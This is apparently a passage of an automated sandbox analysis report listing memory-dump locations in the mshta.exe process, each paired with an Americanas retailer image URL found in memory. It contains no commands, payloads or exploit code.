00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484783384.0000000009508000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/1-banners_home_mob-campanhas-home-300x450-9e
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-banners_home_mob-campanhas-home-300x450-5f
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngX
Source: mshta.exe, 00000000.00000003.25477786545.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459044559.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/3-banners_home_mob-campa
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484783384.0000000009508000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/3-banners_home_mob-campanhas-home-300x450-2a
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438311238.0000000009C1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/4-banners_home_mob-campanhas-home-300x450-79
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86
Source: mshta.exe, 00000000.00000003.25458998686.000000000AAD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443861768.000000000AAD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486858676.000000000AAD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAB5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477650905.000000000AAD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/7-banner
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411154333.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486943615.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/7-banners_home_mob-campanhas-home-300x450-ca
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-banners_home_mob-campanhas-home-300x450-31
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479723195.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png%
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png2
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479723195.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngB
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngL
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png1
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484604910.00000000094BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngE
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngy
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_mob-0600bcc12452.pngc;
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466058120.0000000006F32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.png
